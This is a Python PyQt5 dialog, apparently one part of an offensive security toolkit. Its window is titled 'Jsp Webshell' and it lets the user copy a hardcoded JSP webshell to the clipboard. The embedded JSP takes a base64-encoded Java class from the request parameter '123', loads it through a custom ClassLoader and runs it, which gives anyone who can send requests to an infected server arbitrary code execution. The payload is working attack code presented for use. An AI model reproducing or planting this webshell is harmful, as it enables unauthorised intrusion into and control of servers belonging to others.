# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'genShellJsp.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


from PyQt5 import QtCore, QtWidgets


class Ui_Dialog(QtWidgets.QDialog):
    def __init__(self):
        super().__init__()
        self.initUI()

    def initUI(self):
        self.setObjectName("Dialog")
        self.resize(450, 520)
        self.setMinimumSize(QtCore.QSize(450, 520))
        self.gridLayout = QtWidgets.QGridLayout(self)
        self.gridLayout.setObjectName("gridLayout")
        self.textEdit = QtWidgets.QTextEdit(self)
        self.textEdit.setObjectName("textEdit")
        self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 2)
        self.pushButton = QtWidgets.QPushButton(self)
        self.pushButton.setObjectName("pushButton")
        self.gridLayout.addWidget(self.pushButton, 1, 0, 1, 1)

        self.pushButton.clicked.connect(self.copyCode)

        self.retranslateUi(self)
        QtCore.QMetaObject.connectSlotsByName(self)

    def retranslateUi(self, Dialog):
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Jsp Webshell"))
        self.shellCode =  '''<%!
    class U extends ClassLoader {
      U(ClassLoader c) {
        super(c);
      }
      public Class g(byte[] b) {
          return super.defineClass(null, b, 0, b.length);
      }
    }
    public byte[] base64Decode(String str) throws Exception {
      try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
      } catch (Exception e) {
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
      }
    }
%>
<%
    String cls = request.getParameter("123");
    if (cls != null) {
      new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
'''
        self.textEdit.setText(self.shellCode)
        self.pushButton.setText(_translate("Dialog", "复制代码到剪切板"))

    def copyCode(self):
        clipboard = QtWidgets.QApplication.clipboard()
        clipboard.setText(self.shellCode)
